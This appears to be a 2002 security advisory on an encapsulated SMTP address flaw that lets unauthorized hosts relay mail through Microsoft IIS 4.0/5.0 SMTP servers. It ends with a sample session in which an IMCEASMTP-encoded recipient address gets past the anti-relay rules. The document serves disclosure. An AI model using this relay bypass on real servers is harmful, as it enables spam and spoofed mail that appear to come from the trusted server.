Laurent Frinking of Quark Deutschland GmbH originally discovered this vulnerability. At that time the discovery concerned all versions of Microsoft Exchange 5.5 prior to SP2 with the SP2 IMC patch.
Portcullis have discovered that the Microsoft SMTP Service available withIIS 4.0 and IIS 5.0 is also vulnerable to the encapsulated SMTP addressvulnerability even with anti-relaying features enabled.
This vulnerability allows hosts that are not authorized to relay e-mail via the SMTP server to bypass the anti-relay features and send mail to foreign domains.
The anti-relay rules will be circumvented allowing spam and spoofed mail to be relayed via the SMTP mail server.
If the Microsoft IIS SMTP Server is used to relay spam mail this could result in the mail server being black holed causing disruption to the service.
As the Microsoft IIS SMTP Service is most often utilised in conjunction with IIS for commercial use this flaw could be used in order to engineer customers particularly because spoofed e-mail relayed in this way will show the trusted web server in the SMTP header.
220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at Tue, 28 May 2002 14:54:10 +0100
250 test-mailer Hello [IP address of source host]
MAIL FROM: email@example.com
250 2.1.0 firstname.lastname@example.org....Sender OK
RCPT TO: email@example.com
550 5.7.1 Unable to relay for firstname.lastname@example.org
RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk
250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk
354 Start mail input; end with .
Subject: You are vulnerable.